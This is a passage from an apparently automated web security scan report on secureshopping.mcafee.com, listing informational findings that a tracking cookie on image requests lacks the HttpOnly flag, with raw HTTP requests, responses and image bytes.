Content-Type: image/gif; charset=utf-8
Date: Mon, 16 May 2011 01:32:33 GMT
Content-Length: 19077

GIF89a..9........<V..........Ga......................1J..........9R.......ef.?X...............................sw....l~....Oj....6P.,E......................C^.`d......................@C....AB.WU.......
...[SNIP]...

16.105. http://secureshopping.mcafee.com/images/banner_sa.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_sa.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_sa.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:33 GMT
ETag: "CdLEBc9iQ9a"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 6808
Date: Mon, 16 May 2011 01:32:32 GMT

GIF89a..S...............7....O.(.
i.g..,.....o.....r.x...=.................... ..n...jl.....j ...W.U..B...`..........................R].......u.....^h.......~...mzA.D.9..B....a...........d...........
...[SNIP]...

16.106. http://secureshopping.mcafee.com/images/banner_tp_081610.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_tp_081610.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_tp_081610.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:33 GMT
ETag: "CdLEBc9iRhj"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 9121
Date: Mon, 16 May 2011 01:32:32 GMT

GIF89a..S.......Y..a"2..2..?.";........C..@..C.(N.?c.;Y.Mh.\y.o...................................|...........................................|...............................................Z..Y..^.._
...[SNIP]...

16.107. http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/bgarea_690x250_cccccc.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bgarea_690x250_cccccc.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:38 GMT
ETag: "CdLEBc9iPjK"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 1032
Date: Mon, 16 May 2011 01:32:37 GMT

.PNG
.
...IHDR...............3.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......0.EALK....&a...
..n.q..7.U.}d........x.@..@.8..@...28.@.....v+...1................,..d.. ...Y.....@..........,..d..
...[SNIP]...

16.108. http://secureshopping.mcafee.com/images/btn_compare_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_compare_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_compare_up.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:33 GMT
ETag: "CdLEBc9iPwK"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 1864
Date: Mon, 16 May 2011 01:32:32 GMT

GIF89a..$........5V.r........1R.Ig..8.....:..N.0Q.7X..=. @..>.&F....4T....!A..........bz.Uo....2S....*K....$D.,L.)I.8X..../O.}..m.....'G..7.;Y..;..8..?.+L..7.4R..<.2O."C.... ?.........................
...[SNIP]...

16.109. http://secureshopping.mcafee.com/images/btn_seeit_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_seeit_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_seeit_up.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:32 GMT
ETag: "CdLEBc9iPuR"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 1743
Date: Mon, 16 May 2011 01:32:32 GMT

GIF89a..$.....1R.-N..8.&F..:.7X.!B.....=.... @..>.Rl.......3T.......Jh.,L.0P.y.....*J.5V.$D....2S.4V....(I.by....8X..O.......'G.4U.+L..7.....;.6W..8..?..8.#C..<....Da.:Y. ?............................
...[SNIP]...

16.110. http://secureshopping.mcafee.com/images/category_blank.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_blank.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_blank.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:38 GMT
ETag: "CdLEBc9iQdJ"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 4743
Date: Mon, 16 May 2011 01:32:37 GMT

.PNG
.
...IHDR.......%......Qg.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...

16.111. http://secureshopping.mcafee.com/images/category_blank_background.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_blank_background.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_blank_background.jpg HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:37 GMT
ETag: "CdLEBc9iPYn"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT
Content-Type: image/jpeg; charset=utf-8
Content-Length: 357
Date: Mon, 16 May 2011 01:32:36 GMT

......JFIF.....H.H.....C......................... ....................!........."$".$.......C............................................................................"..............................
...[SNIP]...

16.112. http://secureshopping.mcafee.com/images/category_bottom.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_bottom.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_bottom.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:38 GMT
ETag: "CdLEBc9iQg+"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:37 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 4988
Date: Mon, 16 May 2011 01:32:37 GMT

.PNG
.
...IHDR.......*.....b.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...

16.113. http://secureshopping.mcafee.com/images/category_top.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_top.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_top.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:30 GMT
ETag: "CdLEBc9iQc7"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 4729
Date: Mon, 16 May 2011 01:32:30 GMT

.PNG
.
...IHDR.......(...../.t.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.:J.........kkl.............`h....do..........6<.......z..HW...........1............DDE.Ug...*+-................"I........
...[SNIP]...

16.114. http://secureshopping.mcafee.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; __utmz=192341800.1305509558.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.934359654.1305509558.1305509558.1305509558.1; __utmc=192341800; __utmb=192341800.1.10.1305509558; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:50 GMT
ETag: "CdLEBc9iPi7"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1017
Date: Mon, 16 May 2011 01:32:50 GMT

GIF89a............]^`AAAijl...........1.@Y.p......3..=.
5.5V.Db..?. 4.;..4..E.....?..B..3.....&.Km..3.Vw.>g.Xs..7.......\~...........8...........9....#M.....K..7..:..2. ,..-..9..5.
2..)...........A.
...[SNIP]...

16.115. http://secureshopping.mcafee.com/images/footer-search-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:39 GMT
ETag: "CdLEBc9iPVk"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:39 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 162
Date: Mon, 16 May 2011 01:32:39 GMT

GIF89a..&....................................................................................................!.......,......&......a..i.FU.......c]W0 O...Lf.....;

16.116. http://secureshopping.mcafee.com/images/footer-search-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:35 GMT
ETag: "CdLEBc9iPcp"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 615
Date: Mon, 16 May 2011 01:32:35 GMT

GIF89a..&...............................................................................................................................................................................................
...[SNIP]...

16.117. http://secureshopping.mcafee.com/images/footer-search-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:35 GMT
ETag: "CdLEBc9iPcs"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 618
Date: Mon, 16 May 2011 01:32:35 GMT

GIF89a..&...............................................................................................................................................................................................
...[SNIP]...

16.118. http://secureshopping.mcafee.com/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iP4y"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 2416
Date: Mon, 16 May 2011 01:32:26 GMT

GIF89a,.<.....H[.8T.....)............#C...r|.......|.#..................................j...............6.............z......3..7....\t........1..........ax.u.............}.._iq.Mgjsz..........%9....
...[SNIP]...

16.119. http://secureshopping.mcafee.com/images/nav-menu-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
